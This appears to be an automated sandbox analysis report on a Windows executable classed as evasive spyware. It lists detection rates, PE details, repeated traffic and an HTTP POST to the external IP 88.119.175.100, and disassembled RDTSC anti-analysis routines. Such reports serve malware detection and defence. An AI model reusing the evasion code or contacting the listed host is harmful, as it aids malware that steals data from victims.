Source: u35vHcdxuH.exe | Virustotal: Detection: 39% | Perma Link |
Source: u35vHcdxuH.exe | ReversingLabs: Detection: 27% |
Source: unknown | HTTPS traffic detected: 88.119.175.100:443 -> 192.168.2.4:49762 version: TLS 1.2 |
Source: u35vHcdxuH.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724E85E FindFirstFileW, | 0_2_00007FF76724E85E |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724EF55 FindFirstFileW, | 0_2_00007FF76724EF55 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724ECC1 FindFirstFileW, | 0_2_00007FF76724ECC1 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724ECF3 FindFirstFileW, | 0_2_00007FF76724ECF3 |
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: unknown | TCP traffic detected without corresponding DNS query: 88.119.175.100 |
Source: u35vHcdxuH.exe, 00000000.00000003.834794205.000001E19CA13000.00000004.00000001.sdmp, u35vHcdxuH.exe, 00000000.00000003.834701267.000001E19CA0B000.00000004.00000001.sdmp, u35vHcdxuH.exe, 00000000.00000002.835421850.000001E19CA15000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: u35vHcdxuH.exe, 00000000.00000002.835580240.000001E19CFAF000.00000004.00000001.sdmp | String found in binary or memory: https://88.119.175.100 |
Source: u35vHcdxuH.exe, 00000000.00000002.835383289.000001E19C9E1000.00000004.00000001.sdmp | String found in binary or memory: https://88.119.175.100/ |
Source: unknown | HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/octet-stream, application/jsonContent-Type: text/htmlT: m94DmiorMaUser-Agent: curl/6.17.0Host: 88.119.175.100Content-Length: 8093Connection: CloseCache-Control: no-cache |
Source: unknown | HTTPS traffic detected: 88.119.175.100:443 -> 192.168.2.4:49762 version: TLS 1.2 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Process Stats: CPU usage > 98% |
Source: u35vHcdxuH.exe | Virustotal: Detection: 39% |
Source: u35vHcdxuH.exe | ReversingLabs: Detection: 27% |
Source: u35vHcdxuH.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 | Jump to behavior |
Source: u35vHcdxuH.exe | String found in binary or memory: tSUOZ4I/ADDB+g== |
Source: classification engine | Classification label: mal76.spyw.evad.winEXE@1/0@0/1 |
Source: u35vHcdxuH.exe | Static file information: File size 3866112 > 1048576 |
Source: u35vHcdxuH.exe | Static PE information: Virtual size of .text is bigger than: 0x100000 |
Source: u35vHcdxuH.exe | Static PE information: Image base 0x140000000 > 0x60000000 |
Source: u35vHcdxuH.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x283400 |
Source: u35vHcdxuH.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x10ac00 |
Source: u35vHcdxuH.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA |
Source: u35vHcdxuH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: u35vHcdxuH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: u35vHcdxuH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: u35vHcdxuH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: u35vHcdxuH.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767256835 push r9; ret | 0_2_00007FF767256837 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767242649 pushfq ; ret | 0_2_00007FF767242668 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725862D push rcx; ret | 0_2_00007FF76725862E |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725A6FA push r12; ret | 0_2_00007FF76725A704 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF7672484D1 push rdi; ret | 0_2_00007FF7672484D2 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724A370 push rbp; ret | 0_2_00007FF76724A371 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767254123 push rdi; ret | 0_2_00007FF7672540B9 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767257028 push r11; ret | 0_2_00007FF76725702A |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725910B push r10; ret | 0_2_00007FF76725910D |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767258FF9 push r15; ret | 0_2_00007FF767258FFB |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724AD4C push rbp; ret | 0_2_00007FF76724AD4D |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724EA7A push rbp; ret | 0_2_00007FF76724EA7B |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF7672589F7 push r12; ret | 0_2_00007FF7672589F9 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724F89B push rbx; ret | 0_2_00007FF76724F89C |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724B7BE push rsp; ret | 0_2_00007FF76724B7BF |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767247707 push r10; ret | 0_2_00007FF767247709 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767253711 push r15; ret | 0_2_00007FF767253713 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF7672576F5 push rsp; ret | 0_2_00007FF7672576F6 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725351C push r9; ret | 0_2_00007FF76725351E |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767253435 push rax; ret | 0_2_00007FF767253436 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF7672432B4 push rsi; ret | 0_2_00007FF7672432B5 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724129D push r9; ret | 0_2_00007FF76724129F |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725B2FF push rax; ret | 0_2_00007FF76725B300 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767254047 push r10; ret | 0_2_00007FF767254049 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725402D push rdi; ret | 0_2_00007FF7672540B9 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725409B push rdi; ret | 0_2_00007FF7672540B9 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF7672560A5 push rsi; ret | 0_2_00007FF7672560A6 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76725DF2C pushfq ; ret | 0_2_00007FF76725DF30 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767253FFC push rdi; ret | 0_2_00007FF7672540B9 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767253FE0 push rdi; ret | 0_2_00007FF7672540B9 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767253ED4 push r10; ret | 0_2_00007FF767253ED6 |
Source: u35vHcdxuH.exe | Static PE information: section name: .const |
Source: u35vHcdxuH.exe | Static PE information: section name: .gehcont |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 00000000004587B2 second address: 0000000000450A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A1F6h 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A2C1h 0x0000000e jcxz 00007FD1E0E2A2E6h 0x00000011 jmp 00007FD1E0E2A2BCh 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A2A9h 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A292h 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A1C7h 0x00000028 pushfd 0x00000029 call 00007FD1E0E2A285h 0x0000002e add dword ptr [esp], 31h 0x00000032 push eax 0x00000033 mov eax, FFFF828Fh 0x00000038 dec eax 0x00000039 cwde 0x0000003a dec eax 0x0000003b add eax, dword ptr [esp+08h] 0x0000003f dec eax 0x00000040 sub eax, 27h 0x00000043 dec eax 0x00000044 xchg dword ptr [esp], eax 0x00000047 push eax 0x00000048 dec eax 0x00000049 mov eax, dword ptr [esp+18h] 0x0000004d dec eax 0x0000004e xchg dword ptr [esp+08h], eax 0x00000052 dec eax 0x00000053 xchg dword ptr [esp+10h], eax 0x00000057 dec eax 0x00000058 xchg dword ptr [esp+18h], eax 0x0000005c pop eax 0x0000005d popfd 0x0000005e ret 0x0000005f jmp 00007FD1E0E2A28Ch 0x00000061 jmp 00007FD1E0E2A424h 0x00000066 dec eax 0x00000067 mov dword ptr [esp+08h], ecx 0x0000006b jmp 00007FD1E0E2A195h 0x00000070 dec eax 0x00000071 sub esp, 38h 0x00000074 jmp 00007FD1E0E2A373h 0x00000079 dec eax 0x0000007a cmp dword ptr [esp+40h], 00000000h 0x0000007f jmp 00007FD1E0E2A1B6h 0x00000084 push eax 0x00000085 jmp 00007FD1E0E2A193h 0x0000008a push ecx 0x0000008b jmp 00007FD1E0E2A35Bh 0x00000090 push edx 0x00000091 jmp 00007FD1E0E2A24Ch 0x00000096 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 000000000045896A second address: 00000000004317E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A225h 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A2AEh 0x0000000e jcxz 00007FD1E0E2A2C6h 0x00000011 jmp 00007FD1E0E2A2A1h 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A1E2h 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A26Bh 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A294h 0x00000028 pushfd 0x00000029 call 00007FD1E0E2A265h 0x0000002e add dword ptr [esp], 31h 0x00000032 push eax 0x00000033 mov eax, FFFD8DC7h 0x00000038 dec eax 0x00000039 cwde 0x0000003a dec eax 0x0000003b add eax, dword ptr [esp+08h] 0x0000003f dec eax 0x00000040 sub eax, 27h 0x00000043 dec eax 0x00000044 xchg dword ptr [esp], eax 0x00000047 push eax 0x00000048 dec eax 0x00000049 mov eax, dword ptr [esp+18h] 0x0000004d dec eax 0x0000004e xchg dword ptr [esp+08h], eax 0x00000052 dec eax 0x00000053 xchg dword ptr [esp+10h], eax 0x00000057 dec eax 0x00000058 xchg dword ptr [esp+18h], eax 0x0000005c pop eax 0x0000005d popfd 0x0000005e ret 0x0000005f jmp 00007FD1E0E2A26Ch 0x00000061 jmp 00007FD1E0E2A360h 0x00000066 dec eax 0x00000067 mov dword ptr [esp+08h], ecx 0x0000006b jmp 00007FD1E0E2A1E3h 0x00000070 dec eax 0x00000071 sub esp, 18h 0x00000074 jmp 00007FD1E0E2A2E7h 0x00000079 dec eax 0x0000007a cmp dword ptr [esp+20h], 00000000h 0x0000007f jmp 00007FD1E0E2A1FFh 0x00000084 push eax 0x00000085 jmp 00007FD1E0E2A1ACh 0x0000008a push ecx 0x0000008b jmp 00007FD1E0E2A305h 0x00000090 push edx 0x00000091 jmp 00007FD1E0E2A22Ch 0x00000096 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 00000000004473BF second address: 00000000004473BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A2F0h 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A1E5h 0x0000000e jcxz 00007FD1E0E2A2E3h 0x00000011 jmp 00007FD1E0E2A220h 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A20Ch 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A279h 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A311h 0x00000028 dec eax 0x00000029 add eax, 02h 0x0000002c jmp 00007FD1E0E2A2DDh 0x00000031 dec eax 0x00000032 mov dword ptr [esp+20h], eax 0x00000036 jmp 00007FD1E0E2A168h 0x0000003b jmp 00007FD1E0E2A37Eh 0x00000040 dec eax 0x00000041 mov eax, dword ptr [esp+20h] 0x00000045 jmp 00007FD1E0E2A1C3h 0x0000004a movzx eax, word ptr [eax] 0x0000004d jmp 00007FD1E0E2A35Bh 0x00000052 test eax, eax 0x00000054 jmp 00007FD1E0E2A262h 0x00000059 je 00007FD1E0E2A1D0h 0x0000005f jmp 00007FD1E0E2A1D1h 0x00000064 dec eax 0x00000065 mov eax, dword ptr [esp+28h] 0x00000069 jmp 00007FD1E0E2A38Dh 0x0000006e dec eax 0x0000006f mov ecx, dword ptr [esp+20h] 0x00000073 jmp 00007FD1E0E2A2A0h 0x00000078 movzx ecx, word ptr [ecx] 0x0000007b jmp 00007FD1E0E2A1D5h 0x00000080 mov word ptr [eax], cx 0x00000083 jmp 00007FD1E0E2A2D7h 0x00000088 dec eax 0x00000089 mov eax, dword ptr [esp+28h] 0x0000008d jmp 00007FD1E0E2A1DCh 0x00000092 dec eax 0x00000093 add eax, 02h 0x00000096 jmp 00007FD1E0E2A244h 0x0000009b dec eax 0x0000009c mov dword ptr [esp+28h], eax 0x000000a0 jmp 00007FD1E0E2A335h 0x000000a5 dec eax 0x000000a6 mov eax, dword ptr [esp+20h] 0x000000aa jmp 00007FD1E0E2A1CBh 0x000000af push eax 0x000000b0 jmp 00007FD1E0E2A214h 0x000000b5 push ecx 0x000000b6 jmp 00007FD1E0E2A29Bh 0x000000bb push edx 0x000000bc jmp 00007FD1E0E2A370h 0x000000c1 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 0000000000485BE7 second address: 00000000004A161A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A1FAh 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A26Fh 0x0000000e jcxz 00007FD1E0E2A2C6h 0x00000011 jmp 00007FD1E0E2A2AAh 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A2BFh 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A274h 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A193h 0x00000028 dec eax 0x00000029 mov ecx, dword ptr [esp+30h] 0x0000002d jmp 00007FD1E0E2A2CCh 0x00000032 pushfd 0x00000033 call 00007FD1E0E2A265h 0x00000038 add dword ptr [esp], 31h 0x0000003c push eax 0x0000003d mov eax, 0001B9C5h 0x00000042 dec eax 0x00000043 cwde 0x00000044 dec eax 0x00000045 add eax, dword ptr [esp+08h] 0x00000049 dec eax 0x0000004a sub eax, 27h 0x0000004d dec eax 0x0000004e xchg dword ptr [esp], eax 0x00000051 push eax 0x00000052 dec eax 0x00000053 mov eax, dword ptr [esp+18h] 0x00000057 dec eax 0x00000058 xchg dword ptr [esp+08h], eax 0x0000005c dec eax 0x0000005d xchg dword ptr [esp+10h], eax 0x00000061 dec eax 0x00000062 xchg dword ptr [esp+18h], eax 0x00000066 pop eax 0x00000067 popfd 0x00000068 ret 0x00000069 jmp 00007FD1E0E2A26Ch 0x0000006b jmp 00007FD1E0E2A2ABh 0x00000070 dec eax 0x00000071 mov dword ptr [esp+08h], ecx 0x00000075 jmp 00007FD1E0E2A29Dh 0x0000007a dec eax 0x0000007b mov eax, dword ptr [esp+08h] 0x0000007f jmp 00007FD1E0E2A26Bh 0x00000084 dec eax 0x00000085 mov dword ptr [eax], 00000000h 0x0000008b jmp 00007FD1E0E2A1EAh 0x00000090 push eax 0x00000091 jmp 00007FD1E0E2A276h 0x00000096 push ecx 0x00000097 jmp 00007FD1E0E2A287h 0x0000009c push edx 0x0000009d jmp 00007FD1E0E2A230h 0x000000a2 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 0000000000488901 second address: 0000000000431D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A277h 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A453h 0x0000000e jcxz 00007FD1E0E2A2E6h 0x00000011 jmp 00007FD1E0E2A1D0h 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A1E9h 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A3CAh 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A20Ch 0x00000028 pushfd 0x00000029 call 00007FD1E0E2A285h 0x0000002e add dword ptr [esp], 31h 0x00000032 push eax 0x00000033 mov eax, FFFA923Ch 0x00000038 dec eax 0x00000039 cwde 0x0000003a dec eax 0x0000003b add eax, dword ptr [esp+08h] 0x0000003f dec eax 0x00000040 sub eax, 27h 0x00000043 dec eax 0x00000044 xchg dword ptr [esp], eax 0x00000047 push eax 0x00000048 dec eax 0x00000049 mov eax, dword ptr [esp+18h] 0x0000004d dec eax 0x0000004e xchg dword ptr [esp+08h], eax 0x00000052 dec eax 0x00000053 xchg dword ptr [esp+10h], eax 0x00000057 dec eax 0x00000058 xchg dword ptr [esp+18h], eax 0x0000005c pop eax 0x0000005d popfd 0x0000005e ret 0x0000005f jmp 00007FD1E0E2A28Ch 0x00000061 jmp 00007FD1E0E2A333h 0x00000066 push eax 0x00000067 jmp 00007FD1E0E2A239h 0x0000006c push ecx 0x0000006d jmp 00007FD1E0E2A2CBh 0x00000072 push edx 0x00000073 jmp 00007FD1E0E2A254h 0x00000078 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 000000000047C92D second address: 000000000047C92D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A08Fh 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E29C11h 0x0000000e jcxz 00007FD1E0E2A2C6h 0x00000011 jmp 00007FD1E0E2A350h 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A21Dh 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A4B5h 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A067h 0x00000028 jg 00007FD1E0E2AA63h 0x0000002e jmp 00007FD1E0E2AAC0h 0x00000033 dec eax 0x00000034 arpl word ptr [esp+20h], ax 0x00000038 jmp 00007FD1E0E2A2B1h 0x0000003d mov eax, dword ptr [esp+eax*4+50h] 0x00000041 jmp 00007FD1E0E2A179h 0x00000046 mov dword ptr [esp+2Ch], eax 0x0000004a jmp 00007FD1E0E2997Ch 0x0000004f jmp 00007FD1E0E2A51Fh 0x00000054 cmp dword ptr [esp+2Ch], 00000000h 0x00000059 jmp 00007FD1E0E2AA09h 0x0000005e jng 00007FD1E0E29D6Eh 0x00000064 jmp 00007FD1E0E2A557h 0x00000069 mov eax, dword ptr [esp+20h] 0x0000006d jmp 00007FD1E0E29F84h 0x00000072 inc eax 0x00000074 jmp 00007FD1E0E29D45h 0x00000079 mov dword ptr [esp+20h], eax 0x0000007d jmp 00007FD1E0E2A2FFh 0x00000082 mov eax, dword ptr [esp+00000A98h] 0x00000089 jmp 00007FD1E0E2A584h 0x0000008e cmp dword ptr [esp+20h], eax 0x00000092 jmp 00007FD1E0E2A017h 0x00000097 push eax 0x00000098 jmp 00007FD1E0E2A1A7h 0x0000009d push ecx 0x0000009e jmp 00007FD1E0E2A3C6h 0x000000a3 push edx 0x000000a4 jmp 00007FD1E0E2A7BAh 0x000000a9 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 000000000044C735 second address: 000000000044C735 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A1CFh 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A2F7h 0x0000000e jcxz 00007FD1E0E2A2E6h 0x00000011 jmp 00007FD1E0E2A2C4h 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A1E5h 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A246h 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A276h 0x00000028 mov dword ptr [esp+10h], eax 0x0000002c jmp 00007FD1E0E2A368h 0x00000031 cmp dword ptr [esp+10h], 00000000h 0x00000036 jmp 00007FD1E0E2A22Ch 0x0000003b jne 00007FD1E0E2A23Bh 0x00000041 dec eax 0x00000042 mov eax, dword ptr [esp+08h] 0x00000046 jmp 00007FD1E0E2A2ADh 0x0000004b mov dword ptr [eax], 00000000h 0x00000051 jmp 00007FD1E0E2A23Eh 0x00000056 dec eax 0x00000057 mov eax, dword ptr [esp+08h] 0x0000005b jmp 00007FD1E0E2A224h 0x00000060 dec eax 0x00000061 add eax, 04h 0x00000064 jmp 00007FD1E0E2A2F0h 0x00000069 dec eax 0x0000006a mov dword ptr [esp+08h], eax 0x0000006e jmp 00007FD1E0E2A291h 0x00000073 mov eax, dword ptr [esp+10h] 0x00000077 jmp 00007FD1E0E2A210h 0x0000007c dec eax 0x0000007e jmp 00007FD1E0E2A290h 0x00000083 push eax 0x00000084 jmp 00007FD1E0E2A2D3h 0x00000089 push ecx 0x0000008a jmp 00007FD1E0E2A2ACh 0x0000008f push edx 0x00000090 jmp 00007FD1E0E2A2A2h 0x00000095 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 0000000000440447 second address: 0000000000436001 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E2A88Eh 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A17Ch 0x0000000e jcxz 00007FD1E0E2A2C3h 0x00000011 jmp 00007FD1E0E29C1Ah 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A8B3h 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E29FBCh 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A5BAh 0x00000028 dec eax 0x00000029 mov dword ptr [esp+50h], eax 0x0000002d jmp 00007FD1E0E2A295h 0x00000032 dec eax 0x00000033 mov ecx, dword ptr [esp+000000A0h] 0x0000003a jmp 00007FD1E0E2A05Fh 0x0000003f pushfd 0x00000040 call 00007FD1E0E2A265h 0x00000045 add dword ptr [esp], 31h 0x00000049 push eax 0x0000004a mov eax, FFFF56F1h 0x0000004f dec eax 0x00000050 cwde 0x00000051 dec eax 0x00000052 add eax, dword ptr [esp+08h] 0x00000056 dec eax 0x00000057 sub eax, 27h 0x0000005a dec eax 0x0000005b xchg dword ptr [esp], eax 0x0000005e push eax 0x0000005f dec eax 0x00000060 mov eax, dword ptr [esp+18h] 0x00000064 dec eax 0x00000065 xchg dword ptr [esp+08h], eax 0x00000069 dec eax 0x0000006a xchg dword ptr [esp+10h], eax 0x0000006e dec eax 0x0000006f xchg dword ptr [esp+18h], eax 0x00000073 pop eax 0x00000074 popfd 0x00000075 ret 0x00000076 jmp 00007FD1E0E2A26Ch 0x00000078 jmp 00007FD1E0E2A2D6h 0x0000007d push eax 0x0000007e jmp 00007FD1E0E2A220h 0x00000083 push ecx 0x00000084 jmp 00007FD1E0E2A2A4h 0x00000089 push edx 0x0000008a jmp 00007FD1E0E2A238h 0x0000008f rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | RDTSC instruction interceptor: First address: 0000000000446CDF second address: 00000000004317E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1E0E29F82h 0x00000007 mov ecx, edx 0x00000009 jmp 00007FD1E0E2A361h 0x0000000e jcxz 00007FD1E0E2A2E3h 0x00000011 jmp 00007FD1E0E2A179h 0x00000016 pop edx 0x00000017 jmp 00007FD1E0E2A3B6h 0x0000001c pop ecx 0x0000001d jmp 00007FD1E0E2A163h 0x00000022 pop eax 0x00000023 jmp 00007FD1E0E2A469h 0x00000028 pushfd 0x00000029 call 00007FD1E0E2A285h 0x0000002e add dword ptr [esp], 31h 0x00000032 push eax 0x00000033 mov eax, FFFEAB89h 0x00000038 dec eax 0x00000039 cwde 0x0000003a dec eax 0x0000003b add eax, dword ptr [esp+08h] 0x0000003f dec eax 0x00000040 sub eax, 27h 0x00000043 dec eax 0x00000044 xchg dword ptr [esp], eax 0x00000047 push eax 0x00000048 dec eax 0x00000049 mov eax, dword ptr [esp+18h] 0x0000004d dec eax 0x0000004e xchg dword ptr [esp+08h], eax 0x00000052 dec eax 0x00000053 xchg dword ptr [esp+10h], eax 0x00000057 dec eax 0x00000058 xchg dword ptr [esp+18h], eax 0x0000005c pop eax 0x0000005d popfd 0x0000005e ret 0x0000005f jmp 00007FD1E0E2A28Ch 0x00000061 jmp 00007FD1E0E2A380h 0x00000066 dec eax 0x00000067 mov dword ptr [esp+08h], ecx 0x0000006b jmp 00007FD1E0E2A203h 0x00000070 dec eax 0x00000071 sub esp, 18h 0x00000074 jmp 00007FD1E0E2A307h 0x00000079 dec eax 0x0000007a cmp dword ptr [esp+20h], 00000000h 0x0000007f jmp 00007FD1E0E2A21Fh 0x00000084 push eax 0x00000085 jmp 00007FD1E0E2A1CCh 0x0000008a push ecx 0x0000008b jmp 00007FD1E0E2A325h 0x00000090 push edx 0x00000091 jmp 00007FD1E0E2A24Ch 0x00000096 rdtsc |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724705F | 0_2_00007FF76724705F |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767262ED0 | 0_2_00007FF767262ED0 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF767250D63 | 0_2_00007FF767250D63 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe TID: 7132 | Thread sleep time: -922337203685477s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | System information queried: CurrentTimeZoneInformation | Jump to behavior |
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724E85E FindFirstFileW, | 0_2_00007FF76724E85E |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724EF55 FindFirstFileW, | 0_2_00007FF76724EF55 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724ECC1 FindFirstFileW, | 0_2_00007FF76724ECC1 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Code function: 0_2_00007FF76724ECF3 FindFirstFileW, | 0_2_00007FF76724ECF3 |
Source: C:\Users\user\Desktop\u35vHcdxuH.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: u35vHcdxuH.exe | Binary or memory string: qhgFsTWTt9HBUCoJCHBX9jlfwgZdIYFqvvoK |
Source: u35vHcdxuH.exe, 00000000.00000002.835401649.000001E19C9FA000.00000004.00000001.sdmp, u35vHcdxuH.exe, 00000000.00000002.835580240.000001E19CFAF000.00000004.00000001.sdmp, u35vHcdxuH.exe, 00000000.00000003.834771298.000001E19C9FA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW |
Source: u35vHcdxuH.exe | Binary or memory string: F9jDlFKrjw4edPG2gEQdsgUUYCHGfss4REcGwUicVRvCSI4WXyPlAwXGJePunnNXu8U= |
